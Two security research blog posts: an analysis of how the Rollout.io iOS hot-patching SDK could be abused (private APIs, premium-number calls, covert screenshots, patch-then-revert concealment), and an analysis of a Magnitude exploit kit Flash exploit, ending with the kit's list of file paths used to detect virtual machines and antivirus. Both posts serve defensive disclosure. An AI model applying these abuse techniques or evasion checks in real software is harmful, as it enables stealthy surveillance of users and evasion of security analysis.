Channel: Kristen Dennesen – Security Bloggers Network

Rollout or Not: the Benefits and Risks of iOS Remote Hot Patching

Previously On iOS Remote Hot Patching

Apple’s detailed app review process has resulted in greater security for iOS apps made available through the App Store. However, this review process can be lengthy, which negatively impacts developers who need to quickly patch a buggy or insecure app. As a result, we have seen the development of various third-party solutions that allow developers to remotely hot patch an iOS app on a non-jailbroken device without going through Apple’s review process. While iOS remote hot patching is a very recent concept and still in its infancy, we have seen fierce demand and an emerging market for such products. However, these solutions are not without their own security risks.

In our January blog, we discussed JSPatch, an open source hot patching solution. While JSPatch allows developers to provide better support to users by quickly fixing problematic apps, it potentially allows malicious actors to engage in attacks that evade current iOS security controls.

In this episode, we take you on a tour of Rollout.io, a commercial (though currently with limited free access) solution that attempts to address the remote patching problem with an eye towards security.

Episode 2: Rollout.io

According to their website, Rollout is an Israel-based, venture capital-backed technology startup founded in 2014. The core product is a commercialized solution to the iOS patching problem that essentially allows developers to update their app’s behavior, following an app’s initial approval and release, without going through Apple’s App Store review process.

Co-founder Erez Rusovsky stated that Rollout “created an SDK that allows you to remotely hot-patch native production applications”.  Rollout’s mission statement further states that:

Rollout.io’s mission is to bridge the gap between developers and their live apps. When a live app needs updating, app developers usually wait days and even weeks to get the new version out to their users. Rollout solves this problem by giving developers code-level access to their live apps.

Rollout is aware of the concerns within the community that patching apps outside of the App Store could be a violation of Apple’s review guidelines and practices. Rollout notes both on their FAQ site and in a longer blog post that their process is in compliance.

Technical Wonderland

JSPatch, which we discussed in our previous blog, provides a relatively simple patching framework consisting of three Objective-C files to be imported to an iOS app to activate the remote hot patching capability. As a commercial offering, Rollout offers a software development kit (SDK) and infrastructure that supports patching for scale and efficiency. Rollout provides a simple overview of their process, but also gives us an insider look into the tech stack and the “under the hood” mechanics of their Rollout SDK through their technical blogs. For our analysis, we focus only on the dissection of the Rollout SDK.

In a nutshell, Rollout SDK is built on the following three technologies:

●    dSYM file
●    Method Swizzling
●    JavaScriptCore framework

iOS Debug Symbol File

According to Rollout, the following steps are taken for an app to hook up with Rollout:
1.    The developer chooses to use the Rollout SDK and imports it into their app.
2.    The Rollout SDK parses the app code and generates a dSYM (debug symbol) file, which is uploaded to Rollout’s back end.
3.    The dSYM file is rendered in the developer portal, where it is available to the app developer for use in reviewing and patching the app.

The end result is rendered by Rollout’s developer portal and presented to the developers, allowing them to select and patch a function. Through the Rollout portal, the developer has easy access to all the defined classes (e.g. ViewController) and selectors (e.g., imagePickerController:didFinishPickingMediaWithInfo:) of the analyzed app, as shown in Figure 1.


 
Figure 1: Rollout developer portal allowing the developer easy access to all defined classes and methods in the app

The most common way to patch a bug in an existing function is to replace the faulty implementation of the function with a new, fixed one. But there are situations where a fix is needed in multiple places across the application. In this case, the best practice is to create a new function that encapsulates the shared routine. In Rollout, one can easily achieve this through the interface shown in Figure 2.



Figure 2: Rollout developer portal allowing the developer to add a new method into a class

Rollout also allows developers to resolve problematic situations, such as when a method has been renamed but is still called from some UI code, requiring the developer to bridge the disconnect with a new wrapper method. In this case, selecting a function to be fixed (such as [ViewController imagePickerController:didFinishPickingMediaWithInfo:] shown in Figure 2) will display the JavaScript patch editing interface shown in Figure 3.

 
Figure 3: Rollout developer portal providing a JavaScript editing interface for patch development

Method Swizzling

Method swizzling is known to iOS developers as “black magic.” In short, method swizzling is an Objective-C runtime technique that allows one implementation of a method to replace an existing implementation of another method (of a class or instance) at runtime.

The term “implementation” refers to the actual function pointer to the code of the method. The Objective-C runtime maintains a struct called "objc_method" for each method of a class. This struct holds the method’s name, its argument and return types, and its "implementation", which is represented by a pointer (IMP) to a C function. Swizzling therefore boils down to exchanging the value of the "implementation" field between the objc_method data of two different methods. Figure 4 and Figure 5 visualize the process:
 
Figure 4: The original selector and its implementation mapping in class FortitudeViewController before swizzling
   
Figure 5: The selector and implementation mapping in class FortitudeViewController after method swizzling

In Figure 4, which shows the state before swizzling, each selector in Class FortitudeViewController contains a corresponding pointer IMP that points to its real implementation, which is a C function behind the scene. For instance, selector1 is an objc_method struct that contains pointer IMP1.

The “magic” lies in the availability of three essential C functions in the Objective-C runtime:

●    method_exchangeImplementations
●    class_replaceMethod
●    method_setImplementation

The most common and intuitive way to perform a method swizzling is similar to what is shown in Figure 6.
 

Figure 6: Example code showing method swizzling

This code will turn the internal runtime relation of the relevant methods into the conceptual structure shown in Figure 5. This effectively allows one to replace an existing implementation of a function with a new one, thus leading to a new and uncharted behavior of an app at runtime.
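Since Rollout patches are themselves written in JavaScript, the exchange can be modeled in a few lines of that language. This is a conceptual analogy only; the real mechanism swaps IMP function pointers inside the Objective-C runtime, and all names below are illustrative:

```javascript
// Conceptual model: each "method" record pairs a selector with an
// implementation pointer, as objc_method pairs a name with an IMP.
const methodTable = {
  selector1: { imp: () => "original behavior" },
  selector2: { imp: () => "patched behavior" },
};

// Analogue of method_exchangeImplementations: swap the two "IMP"s.
function exchangeImplementations(table, selA, selB) {
  const tmp = table[selA].imp;
  table[selA].imp = table[selB].imp;
  table[selB].imp = tmp;
}

exchangeImplementations(methodTable, "selector1", "selector2");
console.log(methodTable.selector1.imp()); // "patched behavior"
```

After the swap, any caller still invoking selector1 transparently runs the replacement code, which is exactly what makes swizzling attractive for patching and dangerous for abuse.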

There have been many discussions about the pitfalls and dangers of utilizing this “black magic.” A primary focus is to avoid the unintended side effects of using the C function method_exchangeImplementations (shown above) by instead using class_replaceMethod and method_setImplementation. Further details are beyond the scope of this blog post.

Apple does not seem to have provided any official documentation for the concept of method swizzling, despite documenting the associated runtime APIs. However, there is general consensus within the developer community that method swizzling is permitted. It should also be noted that, to date, Apple does not appear to have rejected an app during its review process due to the use of method swizzling.

JavaScriptCore.framework

The JavaScriptCore framework was introduced in iOS 7. It allows one to evaluate JavaScript programs from within a C-based program, and also lets users insert custom objects into the JavaScript environment. On iOS, it is essentially an Objective-C wrapper around WebKit’s JavaScript engine, extending the power of scripting beyond a web client to the whole app.

The following four classes form the cornerstone of the framework:  

●    JSVirtualMachine represents the self-contained virtual environment in which JavaScript code executes. To initiate a virtual machine instance in Objective-C, one does the following:
JSVirtualMachine *vm = [[JSVirtualMachine alloc] init];

●    JSContext talks to the above runtime, provides access to global objects that reside in the context, and performs the execution of JavaScript code. For example, in Objective-C, one can initiate a JSContext instance and declare a variable in the manner shown here:
JSContext *context = [[JSContext alloc] initWithVirtualMachine:vm];
context[@"name"] = @"Jean-Luc";
context[@"organization"] = @"Enterprise";

●    JSValue is the class that represents arbitrary data in JavaScript. For instance, we have:
JSValue *name = context[@"name"];
JSValue *organization = context[@"organization"];
NSLog(@"Captain Name: %@ \nOrganization: %@", name, organization);

●    JSExport is a protocol that allows one to expose parts of Objective-C classes and methods to JavaScript. The wrapper created through this protocol acts as a passthrough between the Objective-C runtime and the JavaScript runtime, allowing code in one environment to change the state of the other.

Rollout Patch Capability

Rollout exposes to developers only a limited set of JavaScript APIs that are permitted to interact with the Objective-C runtime environment. Its API documentation shows the following essentials:

●    R: the Rollout namespace object that allows integration with the Rollout SDK, the containing function, and the application’s runtime. Among other things, it offers the functionality of the Foundation C function NSClassFromString, as shown in Figure 7.

Figure 7: Portion of Rollout 'R' namespace


●    ObjcBox: encapsulates Objective-C NSObject instances. It allows a transformation from an Objective-C instance to a JavaScript value. There are two important functions, as shown in Figure 8:
 
Figure 8: Portion of Rollout ObjcBox namespace

The APIs provided by Rollout and the legitimate use cases they describe for their hot patching infrastructure are simple, limited, and benign. However, as with many well-intentioned solutions, the possibilities of misuse or abuse remain when malicious individuals think outside the box.

The Usual Suspects

In our blog on JSPatch, we outlined several attack capabilities that could be carried out against that technology, such as loading arbitrary public or private frameworks into an app. The types of capabilities we described for JSPatch also work against Rollout, though we do not provide specific examples here. Instead, we highlight a few additional scenarios specific to Rollout to avoid duplication.

Example 1: Load arbitrary private frameworks and utilize unauthorized private APIs

●    Targeted private framework: /System/Library/PrivateFrameworks/CoreRecents.framework
●    Targeted private API: [[CRRecentContactLibrary defaultInstance] maxDateEventsPerRecentContact]

Figure 9 and Figure 10 show sample exploitation code and the associated console output loading the private framework CoreRecents.framework.
 
Figure 9: Sample exploitation code for loading a private framework

Console Output:


Figure 10: Sample console output showing successful load of the framework

Both this example and the following ones make use of Apple iOS private APIs. The pros and cons of the use of these private APIs by third party apps have been at the center of much debate. In general, the use of Apple’s private APIs by third party apps is risky for both security and stability reasons (for example, unexpected behavior if Apple changes the internals of a private API). Despite Apple’s efforts to prohibit the practice of utilizing non-public APIs, it has proven difficult to identify their use when developers employ obfuscation and other more sophisticated maneuvers.

That said, when an app developer with malicious intent makes use of these private APIs, the calls leave traces within the app code itself, so the malicious code is subject to potential discovery by Apple or a third party. With Rollout’s dynamic hot patching process, however, the intent – that is, the malicious code – can be separated from the app binary itself in the form of a hot patch. Rollout is not the only means of separating private API calls from the app binary, but as a remote hot patching solution it lowers the bar for malware developers to do so.

Example 2: Load arbitrary public frameworks and utilize unauthorized private APIs

●    Targeted public framework: /System/Library/Frameworks/AVFoundation.framework
●    Targeted private API: [AVCaptureDevice devices]

Figure 11 and Figure 12 show sample code used to successfully access the iPhone’s cameras and microphone.    

Figure 11: Example exploit code loading public framework to access the private AVCaptureDevice API

Console outputs three devices: Back Camera; Front Camera; iPhone Microphone.


Figure 12: Console output showing access to the iPhone cameras and microphone

Example 3: Test device for the presence of a targeted app

The ability for one app to check for the presence of another app raises both privacy and security concerns (for example, checking for the presence of an app in order to exploit it). The primary method for obtaining a list of installed apps is through the private API [LSApplicationWorkspace allInstalledApplications]. As we have seen, use of these private APIs is prohibited by Apple’s Developer Program License Agreement.

Some app developers have sought other means to determine installed apps without using Apple’s private APIs. For example, iHasApp used the public API [UIApplication canOpenURL:] to identify installed apps based on their supported URL schemes. Unfortunately, the extensive usage of the API and associated detection method in a large volume of apps resulted in iHasApp and its derived framework being shut down by Apple, and the API being flagged during the app store vetting process.
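The scheme-probing logic behind iHasApp-style detection is simple to model in JavaScript. Here canOpenURL is a stub standing in for the iOS API, and the scheme catalog is a small illustrative sample (real detection libraries shipped catalogs of thousands of schemes):

```javascript
// Hypothetical scheme-to-app mapping; real detection frameworks
// bundled far larger catalogs of URL schemes.
const knownSchemes = {
  "fb://": "Facebook",
  "twitter://": "Twitter",
  "spotify://": "Spotify",
};

// Stub for [UIApplication canOpenURL:]; here we pretend only the
// Twitter app is installed on the device.
const canOpenURL = (url) => url.startsWith("twitter://");

// Probe every known scheme and collect the apps that respond.
function detectInstalledApps() {
  return Object.keys(knownSchemes)
    .filter(canOpenURL)
    .map((scheme) => knownSchemes[scheme]);
}

console.log(detectInstalledApps()); // [ 'Twitter' ]
```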

However, Rollout eliminates this constraint because the API can be called via a hot patch outside of the app itself.

Figure 13 and Figure 14 show sample code using canOpenURL: to detect installed apps.
Figure 13: Sample exploit code calling canOpenUrl
 
Figure 14: Console output showing app detection

Example 4: Make phone calls to premium numbers without consent

By utilizing the public API [UIApplication openURL:], one can launch the native phone app and place a call to an arbitrary premium number. This activity would be immediately visible to the user when the phone app interface was unexpectedly displayed. However, the exploit could be fine-tuned by applying environmental checks (for example, only initiating calls when the user is likely asleep) and by keeping the app alive as a long-running background process through background modes.

Figure 15 and Figure 16 show sample code for dialing a premium number and the successful connection.    

Figure 15: Sample exploit code used to dial a premium phone number

 
Figure 16: Console output showing successful call

Example 5: Take screenshot without informing the user

Figure 17, Figure 18, and Figure 19 show that, through the patch, one can take screenshots of the current foreground screen by utilizing the non-public API [UIImage createSnapshotWithRect:] without the user’s knowledge. The screenshots are saved in the sandbox of the application, from which they could be further exfiltrated off the device.


Figure 17: Sample exploit code showing the use of private API [UIImage createSnapshotWithRect:] to capture the screen



 
Figure 18: Console output showing that the captured screenshot has been saved to the sandbox
 
Figure 19: App sandbox content showing the captured images

All of the above tests were performed on a device running iOS 8.4. Apple has released a number of iOS versions through the years to fix and close security holes reported by both industry practitioners and academic researchers. Most of the private or public APIs that could be abused are protected through various access controls (e.g., entitlements to the Address Book) in newer versions of iOS. However, the reality is that a significant number of users do not keep their devices’ OS version up to date. As a result, “old” attacks through private APIs, which are ineffective against iOS 8.4 or iOS 9, would still be effective against some devices.

Threat Scenario

In our earlier blog on JSPatch, we highlighted three general attack scenarios using an iOS remote hot-patching vector. Of these, two still apply to Rollout in a similar fashion:

1.    Precondition: an embedded third-party ad SDK is malicious.
a.    Consequence: the ad SDK can write to the patch database, which allows it to change the behavior of the app.
2.    Precondition: the app developer is malicious.
a.    Consequence: the developer can perform stealthy but temporary actions against the user, including by utilizing private APIs.

It has been pointed out that an app developer with malicious intent will strive to find a way to distribute their malicious app regardless of the particular framework used. That is, no existing distribution method can fully guard against malicious intent. While we agree with this statement, we also believe it is important to understand how different distribution methods may help or hinder a malicious developer in deploying their malicious code. A developer wishing to distribute a malicious app through the App Store would need to slip the malicious code past the review process. The third-party hot patching frameworks developed to date do not include any review process, so it helps to understand how malicious patches could be distributed and where (or whether) they could be detected.

A risk of hot patching frameworks is that because patches can be deployed ‘on the fly’, a developer could distribute a legitimate app, temporarily deploy a patch to carry out specific malicious activity, and then deploy another patch to revert the app back to its normal, non-malicious behavior. Because this activity can occur automatically in the background, users are highly unlikely to notice the change, and replacement of the malicious patch with a “clean” one could leave little evidence that anything suspicious had occurred.
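The deploy-then-revert trick works because hot patching frameworks dispatch calls through an indirection that can be repointed at any time. A minimal JavaScript sketch of such a dispatcher (hypothetical names, not Rollout’s actual implementation):

```javascript
// Original, legitimate implementation shipped in the app.
function savePhoto(photo) {
  return `saved ${photo}`;
}

// Dispatcher: run the active patch if one is deployed, else the original.
let activePatch = null;
function dispatchSavePhoto(photo) {
  return activePatch ? activePatch(photo) : savePhoto(photo);
}

// Deploy a malicious patch, then "revert" by clearing it; afterwards
// the app behaves exactly as before, leaving little evidence behind.
activePatch = (photo) => `saved ${photo} (and secretly copied it)`;
const during = dispatchSavePhoto("IMG_001");
activePatch = null;
const after = dispatchSavePhoto("IMG_001");
console.log(during); // saved IMG_001 (and secretly copied it)
console.log(after);  // saved IMG_001
```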

To put the threat scenario in perspective, we provide a visualization of such an attack to reinforce the concept and facilitate understanding.  

Fictional Malicious Plotting

Synopsis
Our fictional app, FortitudeSeries, is a newly released iOS app that allows one to add filters to selected photos from the device photo gallery and save the edited photos back to the gallery. In order to offer the user a better experience with quality performance and stable software, we decided to use the Rollout.io service to maintain the ability to remotely hot-patch bugs and security issues should they be discovered in the future.

After testing several patches, we identified several actions we could take outside of what the app was originally designed for. We first tried saving an original copy of all the filtered photos in the sandbox, and it was a quick success. We then became curious about the photos the user does not select for filtering, so we issued a new patch to capture a screenshot of the user’s photo gallery. This too was simple to achieve.


Production
Our fictional attack is demonstrated through three stages to show the following scenarios:

●    Stage 1: Rollout patching is disabled in the backend. FortitudeSeries exhibits only its legitimate behavior. A user selects a photo from the photo gallery by pressing the button “Select A Photo”. Once the photo is selected, the console outputs “Filtering the selected image” and the photo gallery view is dismissed. The app’s Documents directory remains empty. Figure 20 shows the source code of the main view controller of FortitudeSeries.
 

Figure 20: Objective-C code for the core implementation of fictional app FortitudeSeries

●    Stage 2: Rollout patch is enabled with the code shown in Figure 21. The user restarts the app and performs the same sequence of actions. The app’s Documents directory keeps a record of the selected photos and labels them with the timestamp of the photo that was selected.
  

Figure 21: Rollout patch code for saving a copy of the user selected photo in the sandbox

●    Stage 3: Rollout patch is enabled with different code, as shown in Figure 22. The user restarts the app and performs the same sequence of actions described above. The app takes a screenshot of the photo gallery and saves a copy to the sandbox Documents directory using the same naming scheme presented above.
 

Figure 22: Rollout patch code for capturing a screenshot of the photo gallery in stealth

Once the data is in the sandbox of the app, the app may deal with it however it wants. A conceivable approach is to exfiltrate it to a developer-controlled server. It should not be surprising that this can be done via a Rollout patch script that executes at runtime without Apple’s knowledge.  

The operation of the demo is therefore done in the following three stages:

●    Stage 1: Develop FortitudeSeries in Objective-C with the Rollout SDK; deploy it to a user device to allow the user to filter selected photos; confirm no Rollout patch is enabled; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory;
●    Stage 2: Enable Rollout patch with script for scenario I; restart the app; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory;
●    Stage 3: Comment out the patch script for scenario I and enable script for scenario II; restart the app; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory.

Primed with the above depiction, it should be easy to understand the recorded demo below even without a narrative.

Rollout Security Defense

Poor encryption (or no encryption) of the patch script content would leave it open to man-in-the-middle (MITM) attacks; the chances of a successful MITM attack can be reduced significantly through secure implementation of the app and any supporting hot patching framework.

To prevent patches from being tampered with, Rollout invested in the following security measures:

●    The app retrieves the patch data from Rollout.io server through HTTPS. This significantly lowers the chances of being a target of MITM attacks.
●    The patch data is signed with a Rollout.io private key and verified on the device using a corresponding key known to the iOS app, so tampered patches can be detected and rejected.

Security Weakness

The above protection ensures that data is secure in transmission. However, once the patch data lands on the device, it is decrypted accordingly and stored in the sandbox in plaintext. Figure 23 shows the directory #APP_SANDBOX/Library/Caches/#APP_ID containing a specific database Cache.db that contains data resulting from the hot patch network communications.
 

Figure 23: File structure view of the directory containing the database of patch data

All patches that have been pushed to production and received by the client app are stored as records in the table cfurl_cache_receiver_data, as shown in Figure 24.
 

Figure 24: DB table cfurl_cache_receiver_data containing all records of production patches

Each patch is stored in the receiver_data column in JSON format. The JavaScript code is mapped to the key “configuration” in base64 format. For example, the highlighted data blob in Figure 24 contains the base64-encoded content shown in Table 1:


Table 1: base64 content from patch database

The corresponding ASCII form of the data is shown in Figure 25.

Figure 25: Decoded base64 content
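Recovering a patch from the cache requires nothing beyond a base64 decode. A sketch with a hypothetical record mimicking the layout described above (the real blob sits in the receiver_data column):

```javascript
// Hypothetical cached patch record: JSON with the patch script
// base64-encoded under the "configuration" key.
const record = JSON.stringify({
  configuration: Buffer.from('console.log("patched!");').toString("base64"),
});

// Anyone with access to the app sandbox can recover the plaintext
// patch script from the cached record.
const parsed = JSON.parse(record);
const script = Buffer.from(parsed.configuration, "base64").toString("utf8");
console.log(script); // console.log("patched!");
```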

Given Rollout’s existing security measures, such as HTTPS and signed patch data, as well as iOS’s sandbox, this weakness is a minor issue. Since there are other attack vectors that can be more easily exploited (for example, those described in threat scenarios 1 and 2), a third party library may have little motivation to tamper with the cached patches. Should circumstances change, however, this weakness could readily be leveraged.

Field Survey

Rollout’s web site states that its product is “trusted by thousands of mobile app developers”. As Rollout provides a solution for a problem that is unique to iOS developers, we can speculate that all its customers are iOS app developers at this point. Though a few have been highlighted on their main page, the exact number of App Store-approved apps that use Rollout SDK is unknown. We performed a scan using FireEye’s infrastructure in late 2015 and found 130 apps that have been or still are in the App Store using Rollout as a remote hot patching solution. This number has since grown to 245 as of Jan. 19, 2016.  

Unlike apps that adopted JSPatch as their remote hot patching solution, which are predominantly Chinese apps for Chinese-speaking users, apps that use Rollout are mostly marketed towards English-speaking users, and many offer localization for a variety of languages. There are no distinct features among these apps; they span a variety of categories including education, social networking, magazines and newspapers, lifestyle, photo and video, games and more. Most of the apps have very low user adoption in the App Store at this point. The most popular app appears to have been downloaded 62,869 times, while the vast majority have no popularity rating on file.

At the time of this writing, we have not confirmed any malicious activity related to any app that uses the Rollout SDK. We are simply reporting on potential vulnerabilities and avenues for misconduct that could potentially be exploited when using this tool. 

Epilogue

Conclusions

iOS remote hot-patching through a non-Objective-C language to effectively evade the Apple review process – a process that has so far largely led to a safe and clean app ecosystem – is now a reality. Our analysis has placed JSPatch and Rollout under the spotlight as examples of two hot patching frameworks with very different characteristics:

  • JSPatch is developed by a Chinese developer; Rollout.io is provided by an Israel-based company.
  • JSPatch is open sourced; Rollout.io is a commercial product.
  • JSPatch is adopted mostly by Chinese app developers; Rollout.io is marketed to English speaking or international developers.
  • JSPatch and Rollout.io offer different syntax and capabilities for JavaScript code.
  • Their supporting infrastructures differ substantially.

Despite differences in their implementation, both are similar in that they potentially allow a developer to turn an innocuous looking app into something malicious – all while circumventing Apple’s App Store vetting process. What’s more, the underlying “biology” is the same for the two solutions: the combination of JavaScriptCore framework and method swizzling.

When conducting our research, we contacted Rollout regarding the issues described in this post. We gratefully acknowledge Rollout’s responsiveness and assistance in addressing them. As a result, Rollout has indicated that they will prevent developers from accessing iOS private APIs and private frameworks in their future releases of the product so that all patch code is subject to the same types of checks as those in the Apple review process. With Rollout’s upcoming release, the attack examples shown here would be thwarted.

Additional Food for Thought

The current limitations of the App Store review process and the desire from developers for a faster solution means that hot patching, as a process, is unlikely to go away any time soon. We hope that by describing these underlying risks, patch framework developers will institute additional security controls to ensure that they are providing developers with convenience and productivity in iOS app development all while maintaining a clean and safe ecosystem.

In this ecosystem, iOS users are the least able to protect themselves and, consequently, the most vulnerable. When it comes to user security, it is difficult to decide which single stakeholder should assume the responsibility of maintaining and sustaining a safe and clean iOS mobile environment. While Apple has come a long way in keeping its mobile users safe from malware, the task has become increasingly difficult. It is not outrageous to expect third party library or framework providers to offer extra security to ensure their services are not being abused.

While we do not have a definite solution for this complicated issue, we believe a system that functions as follows could potentially increase iOS user security: 1) App developers providing to Apple a list of the third party libraries and frameworks that they use, 2) The underlying technologies of third party libraries and frameworks being provided to Apple, and 3) Third party library or framework providers improving security to ensure their services are used as intended.

 


CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit


On April 2, security researcher @Kafeine at Proofpoint discovered a change to the Magnitude Exploit Kit. Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).

While version 21.0.0.197 contains the vulnerability, the exploit fails against it because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable investment in exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.

Exploit Delivery Chain

Magnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen’s dimensions and color depth (Figure 1).

Figure 1. JS of Profile Gate
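The profiling step needs only a few properties of the browser’s global screen object. A stubbed sketch of the collection logic (the actual gate’s code differs):

```javascript
// Build the fingerprint the profile gate collects; `scr` stands in
// for the browser's global `screen` object.
function profileScreen(scr) {
  return {
    width: scr.width,
    height: scr.height,
    colorDepth: scr.colorDepth,
  };
}

// Example values a victim's browser might report back to the server.
const profile = profileScreen({ width: 1920, height: 1080, colorDepth: 24 });
console.log(JSON.stringify(profile));
// {"width":1920,"height":1080,"colorDepth":24}
```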

The server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.

Figure 2. JS of redirecting to main exploit page

In our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that runs the new Flash exploit (Figure 3).

Figure 3. JS of loading exploits

The Flash Exploit

A memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the Flash memory allocator to allocate buffers under the attacker’s control. The attacker can then create a ByteArray of length 0xFFFFFFFF, giving it the ability to read and write arbitrary memory, as seen in Figure 4. The exploit’s code layout and some of its functionality are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.

Figure 4. ActionScript of Flash exploits

Conclusion

This is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications – such as Internet Explorer/Edge and Flash Player – change the game.

Despite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as EMET from Microsoft.

Click here for the security bulletin issued by Adobe.

Acknowledgements

A huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.

Appendix

res://Program%20Files%20(x86)\Fiddler2\Fiddler.exe/#3/#32512
res://Program%20Files\Fiddler2\Fiddler.exe/#3/#32512
res://Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://Program%20Files%20(x86)\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://Program%20Files\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://Program%20Files%20(x86)\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://Program%20Files\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://Program%20Files%20(x86)\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://Program%20Files\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://Program%20Files%20(x86)\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://Program%20Files\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://Program%20Files%20(x86)\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://Program%20Files\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://Program%20Files%20(x86)\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://Program%20Files\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://Program%20Files%20(x86)\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://Program%20Files\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
